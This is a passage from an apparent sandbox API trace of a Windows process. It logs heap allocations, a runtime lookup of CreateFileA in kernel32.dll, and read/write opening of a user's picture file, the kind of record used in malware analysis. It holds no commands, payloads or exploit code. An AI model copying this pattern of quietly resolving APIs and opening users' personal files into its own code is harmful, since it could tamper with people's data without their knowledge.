(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.480] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c880 [0041.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c880, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.481] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0041.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.481] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0041.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", cchWideChar=64, lpMultiByteStr=0x7ab260, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif", lpUsedDefaultChar=0x0) returned 64 [0041.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.483] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\rygemqdnb-rybeky y-c.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0041.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0041.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=64, lpWideCharStr=0x7d5c40, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\RyGEMqdNb-RYBEky Y-C.gif") returned 64 [0041.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0041.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.485] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0041.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.486] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.487] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.488] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 